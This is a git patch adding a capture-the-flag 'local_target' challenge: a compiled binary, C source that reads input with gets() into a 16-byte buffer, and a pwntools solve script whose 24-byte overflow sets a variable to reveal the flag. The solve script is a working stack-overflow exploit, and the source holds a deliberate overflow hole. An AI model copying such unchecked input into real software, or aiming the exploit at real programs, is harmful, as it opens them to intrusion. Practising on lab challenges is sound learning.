From 7350f4e9579936105b2854fa4a9e8cb076cbb948 Mon Sep 17 00:00:00 2001 From: h7x4 Date: Tue, 3 Sep 2024 20:31:41 +0200 Subject: [PATCH] pwn/local_target --- pwn/local_target/local-target | Bin 0 -> 17088 bytes pwn/local_target/local-target.c | 50 ++++++++++++++++++++++++++++++++ pwn/local_target/solve.py | 31 ++++++++++++++++++++ 3 files changed, 81 insertions(+) create mode 100755 pwn/local_target/local-target create mode 100644 pwn/local_target/local-target.c create mode 100755 pwn/local_target/solve.py diff --git a/pwn/local_target/local-target b/pwn/local_target/local-target new file mode 100755 index 0000000000000000000000000000000000000000..072f668627d6dc758c65b4364fda0415c25b8d46 GIT binary patch literal 17088 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 literal 0 HcmV?d00001 diff --git a/pwn/local_target/local-target.c b/pwn/local_target/local-target.c new file mode 100644 index 0000000..f20ecdd --- /dev/null +++ b/pwn/local_target/local-target.c @@ -0,0 +1,50 @@ +#include +#include + + + +int main(){ + FILE *fptr; + char c; + + char input[16]; + int num = 64; + + printf("Enter a string: "); + fflush(stdout); + gets(input); + printf("\n"); + + printf("num is %d\n", num); + fflush(stdout); + + if( num == 65 ){ + printf("You win!\n"); + fflush(stdout); + // Open file + fptr = fopen("flag.txt", "r"); + if (fptr == NULL) + { + printf("Cannot open file.\n"); + fflush(stdout); + exit(0); + } + + // Read contents from file + c = fgetc(fptr); + while (c != EOF) + { + printf ("%c", c); + c = fgetc(fptr); + } + fflush(stdout); + + printf("\n"); + fflush(stdout); + fclose(fptr); + exit(0); + } + + printf("Bye!\n"); + fflush(stdout); +} diff --git a/pwn/local_target/solve.py b/pwn/local_target/solve.py new file mode 100755 index 0000000..8a32702 --- /dev/null +++ b/pwn/local_target/solve.py @@ -0,0 +1,31 @@ +#!/usr/bin/env nix-shell +#!nix-shell -p python3 -i python3 python3Packages.pwntools + +from pwn import * + +exe = ELF("./local-target") + +context.binary = exe + +ADDR, PORT, *_ = "saturn.picoctf.net 58138".split() + +def conn(): + if args.REMOTE: + r = remote(ADDR, PORT) + else: + r = process([exe.path]) + + return r + +def main(): + r = conn() + + r.recvuntil(b"Enter a string: ") + offset = 24 # found with pwndbg + payload = b'A' * offset + p64(65) + r.sendline(payload) + print(r.recvall()) + r.close() + +if __name__ == "__main__": + main() \ No newline at end of file